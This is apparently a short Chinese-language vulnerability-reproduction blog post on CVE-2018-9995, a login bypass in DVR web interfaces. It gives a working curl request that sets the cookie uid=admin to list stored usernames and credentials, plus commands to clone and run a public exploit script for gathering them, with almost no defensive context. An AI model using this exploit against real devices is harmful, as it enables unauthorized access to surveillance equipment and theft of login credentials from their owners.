【漏洞復現】 CVE-2018-9995 DVR登錄繞過漏洞

漏洞描述

類別:訪問控制失效。訪問DVR系列產品的WEB端時,設置以下cookie:uid=admin可繞過訪問控制,獲取設備內的用戶名及登錄憑證。python

漏洞利用

curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

EXP

git clone https://github.com/exexute/Exp.git
cd Exp/cve-2018-9995/
pip3 install -r requirements.txt
python3 gather_cve2018_9995.py

效果展現

【漏洞復現】 CVE-2018-9995 DVR登錄繞過漏洞

相關文章
相關標籤/搜索